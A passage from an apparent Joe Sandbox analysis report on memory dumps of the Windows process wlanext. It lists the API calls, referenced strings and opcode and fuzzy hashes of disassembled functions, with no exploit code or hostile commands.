                                            • Instruction Fuzzy Hash: 299002A13A114846575017795C0D91935945E88612B620860A405D4058DE518248F552
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560), ref: 00FE5D2E
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560), ref: 00FE5D86
                                            • LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000000), ref: 00FE5D91
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000), ref: 00FE5DA0
                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,Dot11ExtIhvGetVersionInfo,?,00000000,00000000), ref: 00FE5DE6
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000), ref: 00FE5DF3
                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,Dot11ExtIhvInitService,?,00000000,00000000), ref: 00FE5E39
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00000000), ref: 00FE5E46
                                            • GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000,Dot11ExtIhvInitVirtualStation,?,00000000,00000000), ref: 00FE5E7E
                                            • memset.MSVCRT ref: 00FE5F18
                                            • memset.MSVCRT ref: 00FE5F3F
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560,00000000,00000000,?,00000058,?), ref: 00FE6016
                                            • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?,00000000,00000000,?,00000000,00000000), ref: 00FE60B4
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560,?,00000000,00000000), ref: 00FE60BF
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560,?,00000000,00000000), ref: 00FE60D4
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$AddressEnterErrorLastProc$LeaveLibrarymemset$FreeLoadMessageTrace
                                            • String ID: Dot11ExtIhvGetVersionInfo$Dot11ExtIhvInitService$Dot11ExtIhvInitVirtualStation
                                            • API String ID: 263776258-37986322
                                            • Opcode ID: e797a39c08767fb5ff5e0619574705bc81c2764e89454c6b00c0df3543d1acad
                                            • Instruction ID: b09ccb79cafdf517efeebb0d065dff9112acbede3479ded93c6156e5aaab64db
                                            • Opcode Fuzzy Hash: e797a39c08767fb5ff5e0619574705bc81c2764e89454c6b00c0df3543d1acad
                                            • Instruction Fuzzy Hash: 2EC1053190029CABD7669F66CC09F6A7BA5FF047A4F140055EA01E72A6CB75CD80FB91
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
• Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 28f260b792f27072ac2387d1b6819926ad21db16925025a2b899835c618ad2e2
                                            • Instruction ID: 92aa3bade742b50e88b4d4d6cfabddc904c010308c1e200f61df688fe537eaf1
                                            • Opcode Fuzzy Hash: 28f260b792f27072ac2387d1b6819926ad21db16925025a2b899835c618ad2e2
                                            • Instruction Fuzzy Hash: F75108B6A00256BFCB10DF99C9A097EF7B8FB092407148669E4A5D7741E334DE45CBE0
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
• Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                            • API String ID: 48624451-2108815105
                                            • Opcode ID: 0042defa165c1ab947cbc31d722802015beb4a00c47b0dc49921e40b6c17ea70
                                            • Instruction ID: f7130c58a69ee77153191a0e471163b0ce3b640d1abdff98f089ca9e3df20507
                                            • Opcode Fuzzy Hash: 0042defa165c1ab947cbc31d722802015beb4a00c47b0dc49921e40b6c17ea70
                                            • Instruction Fuzzy Hash: 115116B5A44A55AECB34DF9CC9A097FFBFDEB44200B088869E495C7641E774EE408F60
                                            Strings
                                            • Execute=1, xrefs: 03664713
                                            • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03664725
                                            • CLIENT(ntdll): Processing section info %ws..., xrefs: 03664787
                                            • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036646FC
                                            • ExecuteOptions, xrefs: 036646A0
                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03664742
                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03664655
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
• Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                            • API String ID: 0-484625025
                                            • Opcode ID: 84cb25ff51391345b62a9692dfae33d576f03e53b3bb754389c6ce833e1534df
                                            • Instruction ID: 988a5944d9dea42e84d4829c4cb080fc9d68375597bbf642fa91e2a85e53fa17
                                            • Opcode Fuzzy Hash: 84cb25ff51391345b62a9692dfae33d576f03e53b3bb754389c6ce833e1534df
                                            • Instruction Fuzzy Hash: C3514935600B296ADF21EBA8EC89FAE7BA8EF05300F05009DD505AB292DB719A458F54
                                            APIs
                                            • GetTokenInformation.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,00000001(TokenIntegrityLevel),00000000,00000000,00000000,00FF1000,?,00FE1AF4,?,?,?,?,00FEB60C), ref: 00FEB3B2
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00FEB60C), ref: 00FEB3B8
                                            • GetTokenInformation.API-MS-WIN-SECURITY-BASE-L1-1-0(?,00000001(TokenIntegrityLevel),?,00000000,00000000,00000000,?,?,?,?,?,00FEB60C), ref: 00FEB42C
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00FEB60C), ref: 00FEB436
                                            • IsValidSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?,?,?,?,?,00FEB60C), ref: 00FEB465
                                            • GetLengthSid.API-MS-WIN-SECURITY-BASE-L1-1-0(?,?,?,?,?,00FEB60C), ref: 00FEB4A8
                                            • CopySid.API-MS-WIN-SECURITY-BASE-L1-1-0(00000000,00FEB60C,?,00000000,00FEB60C,?,?,?,?,00FEB60C), ref: 00FEB4CA
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00FEB60C), ref: 00FEB4D4
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                              • Part of subcall function 00FEAD7C: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,00FE1AF4,00000021,00FEB52D,0000000A,00000000,?,00000000,?,00FEB52D,?,?,?), ref: 00FEADC7
                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,00000000,?,?,?,?,?,00FEB60C), ref: 00FEB53D
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
• Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ErrorLast$InformationMessageTokenTrace$CopyFreeLengthLocalValid
                                            • String ID:
                                            • API String ID: 3833298366-0
                                            • Opcode ID: 1701a39ba886af77bfeddc9ec6d8e66e532f920285b5c03124ce56e482c31625
                                            • Instruction ID: d0397aabfd09d1591794a85f9b1c46fd3bee6523a21b819db6c2c16bbc9d6ea6
                                            • Opcode Fuzzy Hash: 1701a39ba886af77bfeddc9ec6d8e66e532f920285b5c03124ce56e482c31625
                                            • Instruction Fuzzy Hash: 32618271901288AFDB258F56DC48FBA7BAABF04365F190095F900A72BAC771CD80FB54
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500,00000005,00000000,00000001,?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA3F8
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500,?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA431
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500,?,?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA482
                                            • ChangeTimerQueueTimer.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(?,?,7FFFFFFF,00000000,?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA493
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA49D
                                            • DeleteTimerQueueTimer.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(?,?,000000FF,?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA510
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA51A
                                            • DeleteTimerQueueEx.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(?,000000FF,?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA555
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00FE3B7F,?,?,?,00FE3991,00001388,00001388), ref: 00FEA55F
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                             • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Timer$CriticalErrorLastQueueSection$DeleteLeave$ChangeEnterMessageTrace
                                            • String ID:
                                            • API String ID: 2363892891-0
                                            • Opcode ID: 834840d6b2c563ddb9f7aed188333250eacfb4d9eab8ed632d157ab30652e4a6
                                            • Instruction ID: 2c44fe2f14a6a78898f13e138d5952f555af04f93299ff809c1d88944142ef9a
                                            • Opcode Fuzzy Hash: 834840d6b2c563ddb9f7aed188333250eacfb4d9eab8ed632d157ab30652e4a6
                                            • Instruction Fuzzy Hash: 4A51AE715003C8ABC72A8F269C48F653F5AFF45364F190459E9119B2FACB75E880FB16
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500,?,00000000,00000001,00FE3676), ref: 00FEA1E7
                                            • CreateTimerQueue.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0 ref: 00FEA21E
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEA22D
                                            • CreateTimerQueueTimer.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(00FF1430,00000000,00FE9FB0,7FFFFFFF,00000064,00000010), ref: 00FEA290
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEA29A
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            • DeleteTimerQueueEx.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(?,000000FF), ref: 00FEA334
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEA33E
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500), ref: 00FEA388
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                             • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: Timer$ErrorLastQueue$CreateCriticalSection$DeleteEnterLeaveMessageTrace
                                            • String ID:
                                            • API String ID: 1365609285-0
                                            • Opcode ID: 8bda90c673b2feac384784ef012d73bd0b6521391cdcc3763395e0d8cc9f421a
                                            • Instruction ID: ddd00e8e5d746d8a5f6d352a99d0cade1e13717e932d01f9ad72e8f90c9a1e22
                                            • Opcode Fuzzy Hash: 8bda90c673b2feac384784ef012d73bd0b6521391cdcc3763395e0d8cc9f421a
                                            • Instruction Fuzzy Hash: F751D231A012C4DFC725CF279C44B313B9ABF857A5B280158E901AB2BAD737D851FB52
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560,0000000A,00000000,00000001), ref: 00FE6359
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560), ref: 00FE63C6
                                            • CreateThread.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,00000000,00FE6280,?,00000000,00000000), ref: 00FE63E3
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,?,00001388,00001388), ref: 00FE63EF
                                            • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00001388), ref: 00FE643D
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE644E
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560), ref: 00FE64C7
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00FE64D2
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                             • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$ErrorLastLeave$CloseCreateEnterHandleMessageObjectSingleThreadTraceWait
                                            • String ID:
                                            • API String ID: 4034362199-0
                                            • Opcode ID: 014e150c6b931722fbbc0747ebd2845139690791bc3042e5d771995daccb48d8
                                            • Instruction ID: a5b813c9992fdfb8aaddf5e65aebc1f155ea53b0718d63c8c24ad2fbf4e9beb9
                                            • Opcode Fuzzy Hash: 014e150c6b931722fbbc0747ebd2845139690791bc3042e5d771995daccb48d8
                                            • Instruction Fuzzy Hash: DA51AE719402CCABD72ACF56DC48B793A69AF543A5F180099E901DB2EACB76CC80F754
                                            APIs
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE7DBA
                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,00000000,00000000), ref: 00FE7E85
                                            • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,00000000,00000000), ref: 00FE7EA9
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE7F2F
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE7F9A
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE800E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                             • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: ErrorLast$FreeLocal
                                            • String ID: OnexIndicateResult
                                            • API String ID: 1627422176-2911527112
                                            • Opcode ID: 605696440932cd7b6638685dda97f3fe01f4742b0a24ccb028312a7941b79019
                                            • Instruction ID: 4a16f27ed9b88928ea6ce07330d2d11562e23f6e83102935771e25d837d11f8e
                                            • Opcode Fuzzy Hash: 605696440932cd7b6638685dda97f3fe01f4742b0a24ccb028312a7941b79019
                                            • Instruction Fuzzy Hash: ADE18B71A083819FD729EF26C844B6BBBE9BF84760F04492DF58587265DB70DC40EB52
                                            APIs
                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(00001388,?,?,?,00FE3991,00001388,00001388), ref: 00FE3C3D
                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(00001388,?,?,?,00FE3991,00001388,00001388), ref: 00FE3CC6
                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(00001388,?,?,?,00FE3991,00001388,00001388), ref: 00FE3D54
                                              • Part of subcall function 00FE6121: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560,0000000B,00000000,00000001,00FE3DD8,?,?,?,00FE3991,00001388,00001388), ref: 00FE615C
                                              • Part of subcall function 00FE6121: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1560,?,?,?,00FE3991,00001388,00001388), ref: 00FE624C
                                            • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?,?,?,?,00FE3991,00001388,00001388), ref: 00FE3E16
                                            • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(000002C9,?,?,?,00FE3991,00001388,00001388), ref: 00FE3E62
                                            • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,?,?,00FE3991,00001388,00001388), ref: 00FE3E69
                                            • ExitProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 00FE3E70
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
                                              • Part of subcall function 00FE409B: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1580,00000007,00000000,00000001,00FE3C04,?,?,?,00FE3991,00001388,00001388), ref: 00FE40D5
                                              • Part of subcall function 00FE409B: LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1580,?,?,?,00FE3991,00001388,00001388), ref: 00FE4129
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                             • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalSection$ProcessSleep$EnterLeave$CloseCurrentExitHandleMessageTerminateTrace
                                            • String ID:
                                            • API String ID: 2912847174-0
                                            • Opcode ID: c76b3f34689bc032cca23b4cbdf1c7d0516843725ad0c380a3876a2caf500b8b
                                            • Instruction ID: cfa4961589c2b704ae5ff9dfebb50bd72b32206411cdd5f0867fa8537c2585e7
                                            • Opcode Fuzzy Hash: c76b3f34689bc032cca23b4cbdf1c7d0516843725ad0c380a3876a2caf500b8b
                                            • Instruction Fuzzy Hash: 81C1C6329413C5AADB2A9B13981CB353E56AF40754B28049CF6051F2FFCA27CA97F785
                                            APIs
                                            • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500), ref: 00FE9FC1
                                            • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00FF1500), ref: 00FEA009
                                            • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00FEA028
                                            • QueueUserWorkItem.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(Function_00009EF0,?,00000010), ref: 00FEA06C
                                            • ChangeTimerQueueTimer.API-MS-WIN-CORE-THREADPOOL-LEGACY-L1-1-0(7FFFFFFF,00000064), ref: 00FEA0AF
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEA0BD
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FEA10A
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                             • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CriticalErrorLastQueueSectionTimer$ChangeCountEnterItemLeaveTickUserWork
                                            • String ID:
                                            • API String ID: 1310459940-0
                                            • Opcode ID: d610e5db7b187ba9f3f0843891e924a898fb2afc6250900e7f8a4b6d87920ffe
                                            • Instruction ID: 4f29aa5e6932e4def7b87a6828e8d29d80dff3448260bf860e56b9693c470602
                                            • Opcode Fuzzy Hash: d610e5db7b187ba9f3f0843891e924a898fb2afc6250900e7f8a4b6d87920ffe
                                            • Instruction Fuzzy Hash: 2741A3316002C4DBDB15CF16DC84B353B5AFF40365F284458EA018A2AACB77EC90FB6A
                                            APIs
                                            • Sleep.API-MS-WIN-CORE-SYNCH-L1-2-0(000003E8,00FF0578,0000000C), ref: 00FEFAA0
                                            • _amsg_exit.MSVCRT ref: 00FEFAB5
                                            • _initterm.MSVCRT ref: 00FEFB09
                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00FEFB35
                                            • exit.MSVCRT ref: 00FEFB7C
                                            • _XcptFilter.MSVCRT ref: 00FEFB8E
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4449293545.0000000000FE0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                             • Associated: 00000005.00000002.4449293545.0000000000FF2000.00000040.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449380357.0000000000FF3000.00000002.80000000.00040000.00000000.sdmp
                                             • Associated: 00000005.00000002.4449418962.0000000000FF4000.00000040.80000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_fe0000_wlanext.jbxd
                                            Similarity
                                            • API ID: CurrentFilterImageNonwritableSleepXcpt_amsg_exit_inittermexit
                                            • String ID:
                                            • API String ID: 796493780-0
                                            • Opcode ID: 0e5c9a844b498e3ae4be9a74292e0af4045abd624c4691b6bdc727df27fe2123
                                            • Instruction ID: 4dbbe26743655407640a71e0009c8ab2de75a39bb0261856079f99e750d1fa5f
                                            • Opcode Fuzzy Hash: 0e5c9a844b498e3ae4be9a74292e0af4045abd624c4691b6bdc727df27fe2123
                                            • Instruction Fuzzy Hash: 7831B276A002DADFD721DF67EC45A393768BF85B30F20003AE6059B2A0DB784848FB51
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.4450373088.00000000035C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 035C0000, based on PE: true
                                             • Associated: 00000005.00000002.4450373088.00000000036E9000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000005.00000002.4450373088.00000000036ED000.00000040.00001000.00020000.00000000.sdmp
                                             • Associated: 00000005.00000002.4450373088.000000000375E000.00000040.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_35c0000_wlanext.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                            • Instruction ID: 70bfdf83a9c1626986a8e06c39ed38bf645d31af26763c3458bbcebf5eb8280b
                                            • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                            • Instruction Fuzzy Hash: C4022475618381AFD304CF28C594A6BBBF5EFC8710F48892DF9898B264DB31E905CB56
                                            APIs
                                            • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000,00FF1000,?,00FE14C8,00FE3F98,?,00000001,?,00000000,00000000,00FF15A8), ref: 00FE3502
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000001,?,00000000,00000000,00FF15A8), ref: 00FE350C
                                            • _wtol.MSVCRT(?,?,00000001,?,00000000,00000000,00FF15A8), ref: 00FE3591
                                            • CreateEventW.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000001,00000000,00000000,00000001,?,00000000,00000000,00FF15A8), ref: 00FE35A8
                                            • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00FE35B7
                                              • Part of subcall function 00FE2B70: TraceMessage.API-MS-WIN-EVENTING-CLASSICPROVIDER-L1-1-0(?,?,0000002B,?,?,00000000), ref: 00FE2B81
